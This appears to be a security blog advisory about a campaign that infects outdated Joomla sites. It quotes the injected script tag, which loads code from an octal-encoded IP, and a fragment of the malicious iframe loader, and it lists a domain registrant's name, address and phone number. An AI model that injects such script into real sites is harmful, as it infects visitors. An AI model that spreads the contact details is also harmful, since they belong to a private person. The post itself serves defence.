Malware week – 0133.0331.0242.0033, javadisplay and more

Very busy week in terms of malware. First Hilary Kneber decided to make a come back, and reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, the IP address in octal).

This is the code added to the hacked sites:

<script src="http://0133.0331.0242.0033/0132.js" >..

This is being used to load a malicious iframe from external web sites (,, etc):

document . write("<iframe src="" width =`1`…

This iframe then tries to infect the computer using multiple vulnerabilities (in Java, PDF, flash, etc). These are some of the domains being used to distribute the malware:

This is the Whois info for those domains:

Vladimir Fedorov (
9 Ivana Babushkina st. app.34
Moskovskaya oblast,117292
Tel. +495.5947419

If you are using Joomla, make sure it is updated to the latest version and properly monitored. If you site is currently infected, you can sign up here to get it cleaned up / secured.

If you have any question, let us know.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Share This